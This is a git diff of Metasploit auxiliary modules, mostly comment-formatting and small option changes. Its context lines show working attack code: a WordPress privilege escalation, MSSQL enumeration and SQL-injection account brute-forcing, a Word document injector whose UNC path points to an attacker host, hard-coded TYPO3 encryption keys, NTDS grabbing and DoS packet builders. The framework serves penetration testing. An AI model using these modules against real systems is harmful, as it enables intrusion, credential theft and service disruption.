vprint_status("#{rhost}:#{rport} - using the following target URL: #{uri}")
begin

4
modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb
View File

@ -20,8 +20,8 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' =>
[
'Craig Heffner', #vulnerability discovery and original exploit
'Michael Messner <devnull[at]s3cur1ty.de>' #metasploit module
'Craig Heffner', # vulnerability discovery and original exploit
'Michael Messner <devnull[at]s3cur1ty.de>' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>

2
modules/auxiliary/admin/http/rails_devise_pass_reset.rb
View File

@ -130,7 +130,7 @@ class Metasploit3 < Msf::Auxiliary
return false
end
when 302
#Success!
# Success!
return true
else
print_error("ERROR: received code #{res.code}")

12
modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb
View File

@ -100,20 +100,20 @@ class Metasploit4 < Msf::Auxiliary
else
print_status("Rotating through known encryption keys")
encryption_keys = [
#TYPO3 4.3.x - 4.4.x
# TYPO3 4.3.x - 4.4.x
'd696ab49a803d7816021cb1768a6917d',
'47d1e990583c9c67424d369f3414728e6793d9dc2ae3429d488a7374bc85d2a0b19b62de67d46a6079a75f10934288d3',
'7b13b2203029ed80337f27127a9f1d28c2597f4c08c9a07b782b674731ecf5328c4d900851957899acdc6d4f911bf8b7',
#TYPO3 4.4.7+
# TYPO3 4.4.7+
'fbbdebd9091d914b3cd523485afe7b03e6006ade4125e4cf4c46195b3cecbb9ae0fe0f7b5a9e72ea2ac5f17b66f5abc7',
#TYPO3 4.5.0
# TYPO3 4.5.0
'def76f1d8139304b7edea83b5f40201088ba70b20feabd8b2a647c4e71774b7b0e4086e4039abaf5d4f6a521f922e8a2',
'bac0112e14971f00431639342415ff22c3c3bf270f94175b8741c0fa95df244afb61e483c2facf63cffc320ed61f2731',
#TYPO3 4.5.2
# TYPO3 4.5.2
'14b1225e2c277d55f54d18665791f114f4244f381113094e2a19dfb680335d842e10460995eb653d105a562a5415d9c7',
#TYPO3 4.5.3
# TYPO3 4.5.3
'5d4eede80d5cec8df159fd869ec6d4041cd2fc0136896458735f8081d4df5c22bbb0665ddac56056023e01fbd4ab5283',
#TYPO3 4.5.4 - 4.5.7
# TYPO3 4.5.4 - 4.5.7
'b2aae63def4c512ce8f4386e57b8a48b40312de30775535cbff60a6eab356809a0b596edaad49c725d9963d93aa2ffae',
]
end

15
modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb
View File

@ -13,15 +13,16 @@ class Metasploit3 < Msf::Auxiliary
info,
'Name' => 'WordPress WPLMS Theme Privilege Escalation',
'Description' => %q{
The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows authenticated users of
any user level to set any system option via a lack of validation in the import_data function
of /includes/func.php.
The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows an
authenticated user of any user level to set any system option due to a lack of
validation in the import_data function of /includes/func.php.
The module first changes the admin e-mail address to prevent any
notifications being sent to the actual administrator during the attack, re-enables user
registration in case it has been disabled and sets the default role to be administrator.
This will allow for the user to create a new account with admin privileges via the default
registration page found at /wp-login.php?action=register.
notifications being sent to the actual administrator during the attack,
re-enables user registration in case it has been disabled and sets the default
role to be administrator. This will allow for the user to create a new account
with admin privileges via the default registration page found at
/wp-login.php?action=register.
},
'Author' =>
[

4
modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb
View File

@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
def run
connect
#Grab the MaxDB info.
# Grab the MaxDB info.
pdbmsrv = "\x5A\x00\x00\x00\x03\x5B\x00\x00\x01\x00\x00\x00\xFF\xFF\xFF\xFF"
pdbmsrv << "\x00\x00\x04\x00\x5A\x00\x00\x00\x00\x02\x42\x00\x04\x09\x00\x00"
pdbmsrv << "\x00\x40\x00\x00\xD0\x3F\x00\x00\x00\x40\x00\x00\x70\x00\x00\x00"
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
print_status(info)
end
#Send our command.
# Send our command.
len = 39 + datastore['CMD'].length
data = len.chr + "\x00\x00\x00\x03\x3F\x00\x00\x01\x00\x00\x00\x54\x0D\x00\x00"

6
modules/auxiliary/admin/misc/sercomm_dump_config.rb
View File

@ -47,8 +47,8 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'Author' =>
[
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', #Initial discovery, poc
'Matt "hostess" Andreko <mandreko[at]accuvant.com>' #Msf module
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
],
'References' =>
[
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
unless length == data.length
vprint_warning("#{peer} - Inconsistent length / data packet")
#return nil
# return nil
end
return { :length => length, :data => data }

26
modules/auxiliary/admin/mssql/mssql_enum.rb
View File

@ -48,8 +48,8 @@ class Metasploit3 < Msf::Auxiliary
:type => 'MSSQL_ENUM',
:data => "Version: #{sqlversion}")
#-------------------------------------------------------
#Check Configuration Parameters and check what is enabled
#---------------------------------------------------------
# Check Configuration Parameters and check what is enabled
print_status("Configuration Parameters:")
if vernum.join != "2000"
query = "SELECT name, CAST(value_in_use AS INT) from sys.configurations"
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
sysconfig[l[0].strip] = l[1].to_i
end
else
#enable advanced options
# enable advanced options
mssql_query("EXEC sp_configure \'show advanced options\', 1; RECONFIGURE")[:rows]
query = "EXECUTE sp_configure"
ver = mssql_query(query)[:rows]
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#checking for C2 Audit Mode
# checking for C2 Audit Mode
if sysconfig['c2 audit mode'] == 1
print_status("\tC2 Audit Mode is Enabled")
report_note(:host => datastore['RHOST'],
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#check if xp_cmdshell is enabled
# check if xp_cmdshell is enabled
if vernum.join != "2000"
if sysconfig['xp_cmdshell'] == 1
print_status("\txp_cmdshell is Enabled")
@ -126,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#check if remote access is enabled
# check if remote access is enabled
if sysconfig['remote access'] == 1
print_status("\tremote access is Enabled")
report_note(:host => datastore['RHOST'],
@ -162,7 +162,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#check if Mail stored procedures are enabled
# check if Mail stored procedures are enabled
if vernum.join != "2000"
if sysconfig['Database Mail XPs'] == 1
print_status("\tDatabase Mail XPs is Enabled")
@ -199,7 +199,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#check if OLE stored procedures are enabled
# check if OLE stored procedures are enabled
if vernum.join != "2000"
if sysconfig['Ole Automation Procedures'] == 1
print_status("\tOle Automation Procedures are Enabled")
@ -451,7 +451,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#Check for local accounts with same username as password
# Check for local accounts with same username as password
sameasuser = []
if vernum.join != "2000"
sameasuser = mssql_query("SELECT name FROM sys.sql_logins WHERE PWDCOMPARE\(name, password_hash\) = 1")[:rows]
@ -479,7 +479,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#Check for local accounts with empty password
# Check for local accounts with empty password
blankpass = []
if vernum.join != "2000"
blankpass = mssql_query("SELECT name FROM sys.sql_logins WHERE PWDCOMPARE\(\'\', password_hash\) = 1")[:rows]
@ -507,7 +507,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#Check for dangerous stored procedures
# Check for dangerous stored procedures
fountsp = []
dangeroussp = [
'sp_createorphan',
@ -732,7 +732,7 @@ EOS
end
#-------------------------------------------------------
#Enumerate Instances
# Enumerate Instances
instances =[]
if vernum.join != "2000"
querykey = "EXEC master..xp_regenumvalues \'HKEY_LOCAL_MACHINE\',\'SOFTWARE\\Microsoft\\Microsoft SQL Server\\Instance Names\\SQL\'"
@ -769,7 +769,7 @@ EOS
end
#---------------------------------------------------------
#Enumerate under what accounts the instance services are running under
# Enumerate under what accounts the instance services are running under
print_status("Default Server Instance SQL Server Service is running under the privilege of:")
privdflt = mssql_query("EXEC master..xp_regread \'HKEY_LOCAL_MACHINE\' ,\'SYSTEM\\CurrentControlSet\\Services\\MSSQLSERVER\',\'ObjectName\'")[:rows]
if privdflt != nil

15
modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb
View File

@ -33,12 +33,13 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptInt.new('FuzzNum', [true, 'Number of principal_ids to fuzz.', 3000])
OptInt.new('START_RID', [true, 'RID to start fuzzing at.', 500]),
OptInt.new('END_RID', [true, 'RID to stop fuzzing at.', 3000])
], self.class)
end
def run
print_status("#{peer} - Grabbing the server and domain name...")
print_status("#{peer} - Grabbing the SQL Server name and domain...")
db_server_name = get_server_name
if db_server_name.nil?
print_error("#{peer} - Unable to grab the server name")
@ -71,7 +72,8 @@ class Metasploit3 < Msf::Auxiliary
end
# Get a list of windows users, groups, and computer accounts using SUSER_NAME()
print_status("#{peer} - Brute forcing #{datastore['FuzzNum']} RIDs through the SQL Server, be patient...")
total_rids = datastore['END_RID'] - datastore['START_RID']
print_status("#{peer} - Brute forcing #{total_rids} RIDs via SQL injection, be patient...")
domain_users = get_win_domain_users(windows_domain_sid)
if domain_users.nil?
print_error("#{peer} - Sorry, no Windows domain accounts were found, or DC could not be contacted.")
@ -172,11 +174,12 @@ class Metasploit3 < Msf::Auxiliary
windows_logins = []
total_rids = datastore['END_RID'] - datastore['START_RID']
# Fuzz the principal_id parameter (RID in this case) passed to the SUSER_NAME function
(500..datastore['FuzzNum']).each do |principal_id|
(datastore['START_RID']..datastore['END_RID']).each do |principal_id|
rid_diff = principal_id - datastore['START_RID']
if principal_id % 100 == 0
print_status("#{peer} - Querying SID #{principal_id} of #{datastore['FuzzNum']}")
print_status("#{peer} - #{rid_diff} of #{total_rids } RID queries complete")
end
user_sid = build_user_sid(domain_sid, principal_id)

2
modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb
View File

@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary
return nil
end
#Parse results
# Parse results
parsed_result = res.body.scan(/#{clue_start}(.*?)#{clue_end}/m)
if parsed_result && !parsed_result.empty?

24
modules/auxiliary/admin/mssql/mssql_findandsampledata.rb
View File

@ -53,12 +53,12 @@ class Metasploit3 < Msf::Auxiliary
def sql_statement()
#DEFINED HEADER TEXT
# DEFINED HEADER TEXT
headings = [
["Server","Database", "Schema", "Table", "Column", "Data Type", "Sample Data","Row Count"]
]
#DEFINE SEARCH QUERY AS VARIABLE
# DEFINE SEARCH QUERY AS VARIABLE
sql = "
-- CHECK IF VERSION IS COMPATABLE = > than 2000
IF (SELECT SUBSTRING(CAST(SERVERPROPERTY('ProductVersion') as VARCHAR), 1,
@ -341,11 +341,11 @@ class Metasploit3 < Msf::Auxiliary
#STATUSING
# STATUSING
print_line(" ")
print_status("Attempting to connect to the SQL Server at #{rhost}:#{rport}...")
#CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
# CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
begin
result = mssql_query(sql, false) if mssql_login_datastore
column_data = result[:rows]
@ -355,14 +355,14 @@ class Metasploit3 < Msf::Auxiliary
return
end
#CREATE TABLE TO STORE SQL SERVER DATA LOOT
# CREATE TABLE TO STORE SQL SERVER DATA LOOT
sql_data_tbl = Rex::Ui::Text::Table.new(
'Header' => 'SQL Server Data',
'Indent' => 1,
'Columns' => ['Server', 'Database', 'Schema', 'Table', 'Column', 'Data Type', 'Sample Data', 'Row Count']
)
#STATUSING
# STATUSING
print_status("Attempting to retrieve data ...")
if (column_data.count < 7)
@ -386,7 +386,7 @@ class Metasploit3 < Msf::Auxiliary
print_line(" ")
end
#SETUP ROW WIDTHS
# SETUP ROW WIDTHS
widths = [0, 0, 0, 0, 0, 0, 0, 0]
(column_data|headings).each { |row|
0.upto(7) { |col|
@ -394,7 +394,7 @@ class Metasploit3 < Msf::Auxiliary
}
}
#PRINT HEADERS
# PRINT HEADERS
buffer1 = ""
buffer2 = ""
headings.each { |row|
@ -406,7 +406,7 @@ class Metasploit3 < Msf::Auxiliary
buffer2 = buffer2.chomp(",")+ "\n"
}
#PRINT DIVIDERS
# PRINT DIVIDERS
buffer1 = ""
buffer2 = ""
headings.each { |row|
@ -417,7 +417,7 @@ class Metasploit3 < Msf::Auxiliary
print_line(buffer1)
}
#PRINT DATA
# PRINT DATA
buffer1 = ""
buffer2 = ""
print_line("")
@ -429,7 +429,7 @@ class Metasploit3 < Msf::Auxiliary
print_line(buffer1)
buffer2 = buffer2.chomp(",")+ "\n"
#WRITE QUERY OUTPUT TO TEMP REPORT TABLE
# WRITE QUERY OUTPUT TO TEMP REPORT TABLE
sql_data_tbl << [row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7]]
buffer1 = ""
@ -448,7 +448,7 @@ class Metasploit3 < Msf::Auxiliary
)
end
#CONVERT TABLE TO CSV AND WRITE TO FILE
# CONVERT TABLE TO CSV AND WRITE TO FILE
if (save_loot=="yes")
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_sqlserver_query_results.csv"
path = store_loot("mssql.data", "text/plain", datastore['RHOST'], sql_data_tbl.to_csv, filename, "SQL Server query results",this_service)

6
modules/auxiliary/admin/mysql/mysql_enum.rb
View File

@ -32,11 +32,11 @@ class Metasploit3 < Msf::Auxiliary
print_status("Running MySQL Enumerator...")
print_status("Enumerating Parameters")
#-------------------------------------------------------
#getting all variables
# getting all variables
vparm = {}
res = mysql_query("show variables") || []
res.each do |row|
#print_status(" | #{row.join(" | ")} |")
# print_status(" | #{row.join(" | ")} |")
vparm[row[0]] = row[1]
end
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
query = "use mysql"
mysql_query(query)
#Account Enumeration
# Account Enumeration
# Enumerate all accounts with their password hashes
print_status("Enumerating Accounts:")
query = "select user, host, password from mysql.user"

2
modules/auxiliary/admin/oracle/oracle_sql.rb
View File

@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
begin
print_status("Sending statement: '#{query}'...")
result = prepare_exec(query)
#Need this if 'cause some statements won't return anything
# Need this if statement because some statements won't return anything
if result
result.each do |line|
print_status(line)

12
modules/auxiliary/admin/oracle/oraenum.rb
View File

@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
return if not check_dependencies
begin
#Get all values from v$parameter
# Get all values from v$parameter
query = 'select name,value from v$parameter'
vparm = {}
params = prepare_exec(query)
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Running Oracle Enumeration....")
#Version Check
# Version Check
query = 'select * from v$version'
ver = prepare_exec(query)
print_status("The versions of the Components are:")
@ -64,11 +64,11 @@ class Metasploit3 < Msf::Auxiliary
)
end
#Saving Major Release Number for other checks
# Saving Major Release Number for other checks
majorrel = ver[0].scan(/Edition Release (\d*)./)
#-------------------------------------------------------
#Audit Check
# Audit Check
print_status("Auditing:")
begin
if vparm["audit_trail"] == "NONE"
@ -122,7 +122,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#Security Settings
# Security Settings
print_status("Security Settings:")
begin
@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary
end
#-------------------------------------------------------
#Password Policy
# Password Policy
print_status("Password Policy:")
begin
query = %Q|

2
modules/auxiliary/admin/smb/psexec_command.rb
View File

@ -133,7 +133,7 @@ class Metasploit3 < Msf::Auxiliary
end
#check if our process is done using these files
# check if our process is done using these files
def exclusive_access(*files)
simple.connect("\\\\#{@ip}\\#{@smbshare}")
files.each do |file|

2
modules/auxiliary/admin/smb/psexec_ntdsgrab.rb
View File

@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
@smbshare = datastore['SMBSHARE']
# Try and connect
if connect
#Try and authenticate with given credentials
# Try and authenticate with given credentials
begin
smb_login
rescue StandardError => autherror

4
modules/auxiliary/admin/tikiwiki/tikidblib.rb
View File

@ -64,10 +64,10 @@ class Metasploit3 < Msf::Auxiliary
n = 0
c = 0
#puts "body is #{res.body.length} bytes"
# puts "body is #{res.body.length} bytes"
infos = res.body.split(/\r?\n/)
infos.each do |row|
#puts row.inspect
# puts row.inspect
if (c < 6)
if (row.match(/\["file"\]=>/))
c+=1

2
modules/auxiliary/analyze/jtr_aix.rb
View File

@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
def run
cracker = new_john_cracker
#generate our wordlist and close the file handle
# generate our wordlist and close the file handle
wordlist = wordlist_file
wordlist.close
print_status "Wordlist file written out to #{wordlist.path}"

2
modules/auxiliary/analyze/jtr_linux.rb
View File

@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
cracker = new_john_cracker
#generate our wordlist and close the file handle
# generate our wordlist and close the file handle
wordlist = wordlist_file
wordlist.close
print_status "Wordlist file written out to #{wordlist.path}"

2
modules/auxiliary/analyze/jtr_mssql_fast.rb
View File

@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
@formats = Set.new
cracker = new_john_cracker
#generate our wordlist and close the file handle
# generate our wordlist and close the file handle
wordlist = wordlist_file
wordlist.close
print_status "Wordlist file written out to #{wordlist.path}"

2
modules/auxiliary/analyze/jtr_mysql_fast.rb
View File

@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
def run
cracker = new_john_cracker
#generate our wordlist and close the file handle
# generate our wordlist and close the file handle
wordlist = wordlist_file
wordlist.close
print_status "Wordlist file written out to #{wordlist.path}"

2
modules/auxiliary/analyze/jtr_postgres_fast.rb
View File

@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
hash_list = hash_file
#generate our wordlist and close the file handle
# generate our wordlist and close the file handle
wordlist = wordlist_file
wordlist.close

18
modules/auxiliary/bnat/bnat_router.rb
View File

@ -49,29 +49,29 @@ class Metasploit3 < Msf::Auxiliary
bnatmac = arp2(bnatip,outint)
print_line("Obtained BNAT MAC: #{bnatmac}\n\n")
#Create Interface Specific Configs
# Create Interface Specific Configs
outconfig = PacketFu::Config.new(PacketFu::Utils.ifconfig ":#{outint}").config
inconfig = PacketFu::Config.new(PacketFu::Utils.ifconfig ":#{inint}").config
#Set Captures for Traffic coming from Outside and from Inside respectively
# Set Captures for Traffic coming from Outside and from Inside respectively
outpcap = PacketFu::Capture.new( :iface => "#{outint}", :start => true, :filter => "tcp and src #{bnatip}" )
print_line("Now listening on #{outint}...")
inpcap = PacketFu::Capture.new( :iface => "#{inint}", :start => true, :filter => "tcp and src #{clientip} and dst #{serverip}" )
print_line("Now listening on #{inint}...\n\n")
#Start Thread from Outside Processing
# Start Thread from Outside Processing
fromout = Thread.new do
loop do
outpcap.stream.each do |pkt|
packet = PacketFu::Packet.parse(pkt)
#Build a shell packet that will never hit the wire as a hack to get desired mac's
# Build a shell packet that will never hit the wire as a hack to get desired mac's
shell_pkt = PacketFu::TCPPacket.new(:config => inconfig, :timeout => 0.1, :flavor => "Windows")
shell_pkt.ip_daddr = clientip
shell_pkt.recalc
#Mangle Received Packet and Drop on the Wire
# Mangle Received Packet and Drop on the Wire
packet.ip_saddr = serverip
packet.ip_daddr = clientip
packet.eth_saddr = shell_pkt.eth_saddr
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
#Start Thread from Inside Processing
# Start Thread from Inside Processing
fromin = Thread.new do
loop do
inpcap.stream.each do |pkt|
@ -98,19 +98,19 @@ class Metasploit3 < Msf::Auxiliary
packet.eth_daddr = bnatmac
end
#Build a shell packet that will never hit the wire as a hack to get desired mac's
# Build a shell packet that will never hit the wire as a hack to get desired mac's
shell_pkt = PacketFu::TCPPacket.new(:config=>outconfig, :timeout=> 0.1, :flavor=>"Windows")
shell_pkt.ip_daddr = serverip
shell_pkt.recalc
#Mangle Received Packet and Drop on the Wire
# Mangle Received Packet and Drop on the Wire
packet.eth_saddr = shell_pkt.eth_saddr
packet.ip_saddr=shell_pkt.ip_saddr
packet.recalc
inj = PacketFu::Inject.new( :iface => "#{outint}", :config =>outconfig )
inj.a2w(:array => [packet.to_s])
#Trigger Cisco SPI Vulnerability by Double-tapping the SYN
# Trigger Cisco SPI Vulnerability by Double-tapping the SYN
if packet.tcp_flags.syn == 1 && packet.tcp_flags.ack == 0
select(nil, nil, nil, 0.75)
inj.a2w(:array => [packet.to_s])

40
modules/auxiliary/docx/word_unc_injector.rb
View File

@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
], self.class)
end
#here we create an empty .docx file with the UNC path. Only done when FILENAME is empty
# here we create an empty .docx file with the UNC path. Only done when FILENAME is empty
def make_new_file
metadata_file_data = ""
metadata_file_data << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><cp:coreProperties"
@ -65,12 +65,12 @@ class Metasploit3 < Msf::Auxiliary
metadata_file_data << "2013-01-08T14:14:00Z</dcterms:created><dcterms:modified xsi:type=\"dcterms:W3CDTF\">"
metadata_file_data << "2013-01-08T14:14:00Z</dcterms:modified></cp:coreProperties>"
#where to find the skeleton files required for creating an empty document
# where to find the skeleton files required for creating an empty document
data_dir = File.join(Msf::Config.data_directory, "exploits", "docx")
zip_data = {}
#add skeleton files
# add skeleton files
vprint_status("Adding skeleton files from #{data_dir}")
Dir["#{data_dir}/**/**"].each do |file|
if not File.directory?(file)
@ -78,19 +78,19 @@ class Metasploit3 < Msf::Auxiliary
end
end
#add on-the-fly created documents
# add on-the-fly created documents
vprint_status("Adding injected files")
zip_data["docProps/core.xml"] = metadata_file_data
zip_data["word/_rels/settings.xml.rels"] = @rels_file_data
#add the otherwise skipped "hidden" file
# add the otherwise skipped "hidden" file
file = "#{data_dir}/_rels/.rels"
zip_data[file.sub(data_dir,'')] = File.read(file)
#and lets create the file
# and lets create the file
zip_docx(zip_data)
end
#here we inject an UNC path into an existing file, and store the injected file in FILENAME
# here we inject an UNC path into an existing file, and store the injected file in FILENAME
def manipulate_file
ref = "<w:attachedTemplate r:id=\"rId1\"/>"
@ -99,24 +99,24 @@ class Metasploit3 < Msf::Auxiliary
return nil
end
#lets extract our docx and store it in memory
# lets extract our docx and store it in memory
zip_data = unzip_docx
#file to check for reference file we need
# file to check for reference file we need
file_content = zip_data["word/settings.xml"]
if file_content.nil?
print_error("Bad \"word/settings.xml\" file, check if it is a valid .docx.")
return nil
end
#if we can find the reference to our inject file, we don't need to add it and can just inject our unc path.
# if we can find the reference to our inject file, we don't need to add it and can just inject our unc path.
if not file_content.index("w:attachedTemplate r:id=\"rId1\"").nil?
vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)")
zip_data["word/_rels/settings.xml.rels"] = @rels_file_data
# lets zip the end result
zip_docx(zip_data)
else
#now insert the reference to the file that will enable our malicious entry
# now insert the reference to the file that will enable our malicious entry
insert_one = file_content.index("<w:defaultTabStop")
if insert_one.nil?
@ -135,16 +135,16 @@ class Metasploit3 < Msf::Auxiliary
return nil
end
#update the files that contain the injection and reference
# update the files that contain the injection and reference
zip_data["word/settings.xml"] = file_content
zip_data["word/_rels/settings.xml.rels"] = @rels_file_data
#lets zip the file
# lets zip the file
zip_docx(zip_data)
end
return 0
end
#making the actual docx from the hash
# making the actual docx from the hash
def zip_docx(zip_data)
docx = Rex::Zip::Archive.new
zip_data.each_pair do |k,v|
@ -153,11 +153,11 @@ class Metasploit3 < Msf::Auxiliary
file_create(docx.pack)
end
#unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way
# unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way
def unzip_docx
#Ruby sometimes corrupts the document when manipulating inside a compressed document, so we extract it with Zip::File
# Ruby sometimes corrupts the document when manipulating inside a compressed document, so we extract it with Zip::File
vprint_status("Extracting #{datastore['SOURCE']} into memory.")
#we read it all into memory
# we read it all into memory
zip_data = Hash.new
begin
Zip::File.open(datastore['SOURCE']) do |filezip|
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
def run
#we need this in make_new_file and manipulate_file
# we need this in make_new_file and manipulate_file
@rels_file_data = ""
@rels_file_data << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>".chomp
@rels_file_data << "<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\">".chomp
@ -182,11 +182,11 @@ class Metasploit3 < Msf::Auxiliary
@rels_file_data << "attachedTemplate\" Target=\"file://\\\\#{datastore['LHOST']}\\normal.dot\" TargetMode=\"External\"/></Relationships>"
if "#{datastore['SOURCE']}" == ""
#make an empty file
# make an empty file
print_status("Creating empty document that points to #{datastore['LHOST']}.")
make_new_file
else
#extract the word/settings.xml and edit in the reference we need
# extract the word/settings.xml and edit in the reference we need
print_status("Injecting UNC path into existing document.")
if manipulate_file.nil?
print_error("Failed to create a document from #{datastore['SOURCE']}.")

4
modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb
View File

@ -58,8 +58,8 @@ class Metasploit4 < Msf::Auxiliary
}
# XXX: There is rarely, if ever, a need for a 'for' loop in Ruby
# This should be rewritten with 1.upto() or Enumerable#each or
# something
# This should be rewritten with 1.upto() or Enumerable#each or
# something
for x in 1..datastore['RLIMIT']
print_status("Sending request #{x} to #{peer}")
begin

6
modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb
View File

@ -21,9 +21,9 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' =>
[
'Steve Jones', #original discoverer
'Hoagie <andi[at]void.at>', #original public exploit
'Paulino Calderon <calderon[at]websec.mx>', #metasploit module
'Steve Jones', # original discoverer
'Hoagie <andi[at]void.at>', # original public exploit
'Paulino Calderon <calderon[at]websec.mx>', # metasploit module
],
'License' => MSF_LICENSE,
'References' =>

4
modules/auxiliary/dos/samba/lsa_addprivs_heap.rb
View File

@ -51,9 +51,9 @@ class Metasploit3 < Msf::Auxiliary
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
# Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+)
# Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+)
# Mac OS X: PC control via memcpy to stack ptr
# Solaris: PC control via memcpy to stack ptr
# Solaris: PC control via memcpy to stack ptr
stub = lsa_open_policy(dcerpc)
stub << NDR.long(1)

38
modules/auxiliary/dos/ssl/openssl_aesni.rb
View File

@ -42,32 +42,32 @@ class Metasploit4 < Msf::Auxiliary
def run
# Client Hello
p1 = "\x16" # Content Type: Handshake
p1 = "\x16" # Content Type: Handshake
p1 << "\x03\x01" # Version: TLS 1.0
p1 << "\x00\x7e" # Length: 126
p1 << "\x01" # Handshake Type: Client Hello
p1 << "\x01" # Handshake Type: Client Hello
p1 << "\x00\x00\x7a" # Length: 122
p1 << "\x03\x02" # Version: TLS 1.1
p1 << ("A" * 32) # Random
p1 << "\x00" # Session ID Length: 0
p1 << "\x00" # Session ID Length: 0
p1 << "\x00\x08" # Cypher Suites Length: 6
p1 << "\xc0\x13" # - ECDHE-RSA-AES128-SHA
p1 << "\x00\x39" # - DHE-RSA-AES256-SHA
p1 << "\x00\x35" # - AES256-SHA
p1 << "\x00\xff" # - EMPTY_RENEGOTIATION_INFO_SCSV
p1 << "\x01" # Compression Methods Length: 1
p1 << "\x00" # - NULL-Compression
p1 << "\x01" # Compression Methods Length: 1
p1 << "\x00" # - NULL-Compression
p1 << "\x00\x49" # Extensions Length: 73
p1 << "\x00\x0b" # - Extension: ec_point_formats
p1 << "\x00\x04" # Length: 4
p1 << "\x03" # EC Points Format Length: 3
p1 << "\x00" # - uncompressed
p1 << "\x01" # - ansiX962_compressed_prime
p1 << "\x02" # - ansiX962_compressed_char2
p1 << "\x03" # EC Points Format Length: 3
p1 << "\x00" # - uncompressed
p1 << "\x01" # - ansiX962_compressed_prime
p1 << "\x02" # - ansiX962_compressed_char2
p1 << "\x00\x0a" # - Extension: elliptic_curves
p1 << "\x00\x34" # Length: 52
p1 << "\x00\x32" # Elliptic Curves Length: 50
# 25 Elliptic curves:
# 25 Elliptic curves:
p1 << "\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\x09\x00\x0a"
p1 << "\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04"
p1 << "\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10"
@ -77,7 +77,7 @@ class Metasploit4 < Msf::Auxiliary
p1 << "\x00\x00" # Length: 0
p1 << "\x00\x0f" # - Extension: Heartbeat
p1 << "\x00\x01" # Length: 1
p1 << "\x01" # Peer allowed to send requests
p1 << "\x01" # Peer allowed to send requests
# Change Cipher Spec Message
@ -97,12 +97,12 @@ class Metasploit4 < Msf::Auxiliary
# Client Key Exchange, Change Cipher Spec, Encrypted Handshake
# AES256-SHA
p2_aes_sha = "\x16" # Content Type: Handshake
p2_aes_sha << "\x03\x02" # Version: TLS 1.1
p2_aes_sha << "\x01\x06" # Length: 262
p2_aes_sha << "\x03\x02" # Version: TLS 1.1
p2_aes_sha << "\x01\x06" # Length: 262
p2_aes_sha << "\x10" # Handshake Type: Client Key Exchange
p2_aes_sha << "\x00\x01\x02" # Length: 258
p2_aes_sha << "\x01\x00" # Encrypted PreMaster Length: 256
p2_aes_sha << ("\x00" * 256) # Encrypted PresMaster (irrelevant)
p2_aes_sha << "\x00\x01\x02" # Length: 258
p2_aes_sha << "\x01\x00" # Encrypted PreMaster Length: 256
p2_aes_sha << ("\x00" * 256) # Encrypted PresMaster (irrelevant)
